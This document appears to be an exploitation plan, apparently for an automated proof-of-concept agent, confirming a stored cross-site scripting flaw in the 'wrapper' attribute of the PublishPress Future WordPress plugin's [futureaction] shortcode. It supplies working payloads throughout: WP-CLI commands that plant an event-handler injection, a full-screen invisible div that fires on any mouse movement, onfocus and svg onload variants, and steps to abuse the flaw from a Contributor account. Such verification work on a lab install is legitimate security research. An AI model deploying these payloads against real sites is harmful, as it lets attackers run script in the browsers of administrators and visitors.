Schedule Post Changes With PublishPress Future: Unpublish, Delete, Change Status, Trash, Change Categories <= 4.10.0 - Authenticated (Administrator+) Stored Cross-Site Scripting via 'wrapper' Shortcode Attribute

This plan outlines the steps to verify a Stored Cross-Site Scripting (XSS) vulnerability in the PublishPress Future plugin (v4.10.0 and below). The vulnerability exists in the handling of the wrapper attribute within the [futureaction] shortcode.

1. Vulnerability Summary

The [futureaction] shortcode allows users to display information about scheduled post changes. The wrapper attribute defines the HTML tag used to wrap this information. The plugin uses esc_html() on the wrapper value, but subsequently uses it as a tag name within a sprintf() call (e.g., <%s>...</%s>).

Because esc_html() only encodes entities like < and >, it does not prevent the injection of spaces and additional attributes. An attacker can break out of the tag name and inject event handlers (like onmouseover or onload).

2. Attack Vector Analysis

• Shortcode: [futureaction]
• Vulnerable Attribute: wrapper
• Payload Location: The value of the wrapper attribute in a post or page.
• Authentication Level: Administrator (default), or Contributor/Author if they are permitted to use shortcodes.
• Vulnerable Path: The shortcode rendering logic, typically found in a controller like src/Modules/Expirator/Controllers/ShortcodeController.php (inferred from plugin structure).

3. Code Flow (Inferred)

1. Entry Point: A user with post-editing capabilities creates a post containing: [futureaction wrapper="div onmouseover=alert(1)"].
2. Shortcode Processing: WordPress identifies the [futureaction] shortcode and calls the plugin's registered callback function.
3. Attribute Extraction: The callback retrieves attributes. The wrapper attribute is assigned the value div onmouseover=alert(1).
4. Insufficient Sanitization: The code applies esc_html("div onmouseover=alert(1)"). Since there are no HTML special characters, the string remains unchanged.
5. Vulnerable Sink: The code constructs HTML using sprintf or string concatenation:

   $output = sprintf('<%1$s>%2$s</%1$s>', $wrapper, $content);
   

6. Resulting HTML:

   <div onmouseover=alert(1)>Shortcode Content</div onmouseover=alert(1)>
   

7. Execution: When any user (including an Administrator) views the post, the injected attribute fires.

4. Nonce Acquisition Strategy

This vulnerability does not require an AJAX or REST API nonce for the exploitation phase (rendering). It only requires the ability to save a post containing the shortcode.

If the goal is to demonstrate exploitation via a lower-privileged user (e.g., Contributor) and you need to bypass standard WordPress post-save nonces, you would follow the standard WordPress UI flow:

1. Navigate to the post editor (wp-admin/post-new.php).
2. Extract the _wpnonce from the form.
3. Submit the post via http_request.

However, for a PoC, we will assume the attacker has the capability to create/edit posts (as an Administrator or Contributor) and will use WP-CLI to set up the payload.

5. Exploitation Strategy

We will create a post containing a malicious shortcode and then verify its rendering.

Step 1: Identify the target.
We will target a standard post.

Step 2: Create the payload post.
Use a payload that triggers automatically or via a simple interaction.
Payload: div onmouseover=alert(document.domain) style=display:block;width:1000px;height:1000px;position:fixed;top:0;left:0;z-index:9999 (This covers the whole page in an invisible div that triggers on any mouse movement).

Step 3: Execute the HTTP request.
Navigate to the post and capture the response HTML.

6. Test Data Setup

1. Ensure Plugin is Active:

   wp plugin activate post-expirator
   

2. Create the Malicious Post:

   wp post create --post_type=post --post_title="XSS Test" --post_status=publish --post_content='[futureaction wrapper="div onmouseover=alert(window.origin) style=position:fixed;top:0;left:0;width:100%;height:100%;z-index:9999;" dummytag="test"]'
   

   Note: We include dummytag="test" to ensure the content within the shortcode is not empty, forcing the wrapper to render.

7. Expected Results

When viewing the post via http_request, the HTML source should contain:

<div onmouseover=alert(window.origin) style=position:fixed;top:0;left:0;width:100%;height:100%;z-index:9999; dummytag="test">

The browser agent should detect the alert(window.origin) execution if the onmouseover event is triggered.

8. Verification Steps

1. HTTP Verification:
   Use the http_request tool to fetch the permalink of the created post.

   // In the PoC agent
   const response = await http_request({
     url: "http://localhost:8080/?p=ID_OF_CREATED_POST",
     method: "GET"
   });
   if (response.body.includes('onmouseover=alert(window.origin)')) {
     console.log("Vulnerability Confirmed: Injected attribute found in HTML.");
   }
   

2. Database Verification:
   Verify that the shortcode remains in the database and was not stripped by WordPress's kses filters during save (which happens for Contributors but not Admins).

   wp post get <ID> --field=post_content
   

9. Alternative Approaches

• Autofocus/Onfocus Payload: If onmouseover is not ideal for the environment:
  [futureaction wrapper="input autofocus onfocus=alert(1)"]
• SVG Payload: If the plugin restricts the wrapper to certain tags (unlikely given the sprintf description):
  [futureaction wrapper="svg onload=alert(1)"]
• Contributor Role Test: Verify if a Contributor can perform this. By default, WordPress allows Contributors to use shortcodes but strips unfiltered_html. However, since the vulnerability is in how the plugin renders the shortcode attributes (and the attributes themselves are just text in the post_content), the kses filter will not stop this injection.
  1. Create a Contributor user.
  2. Log in as Contributor.
  3. Create a post with the shortcode.
  4. View as Admin.